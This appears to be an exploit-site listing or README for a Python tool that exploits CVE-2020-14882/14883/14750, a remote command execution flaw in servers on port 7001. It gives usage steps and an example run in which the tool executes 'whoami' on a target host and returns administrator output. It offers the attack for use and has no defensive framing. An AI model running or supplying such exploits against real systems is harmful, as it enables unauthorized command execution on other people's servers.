Exploit for CVE-2020-14882
Exploit Code
## https://sploitus.com/exploit?id=E431282E-5250-58B8-B692-7D184D2EFF7E
# CVE-2020-14882
CVE-2020-14882/14883/14750
# USE
1. clone this repo
2. install `requests` lib
3. `python3 14882.py `
# E.G
```
λ python3 14882.py -u http://*.*.*.*:7001 -c whoami
[+] Command success result:
win-t63ko18er74\administrator
```
# reference
https://github.com/jas502n/CVE-2020-14882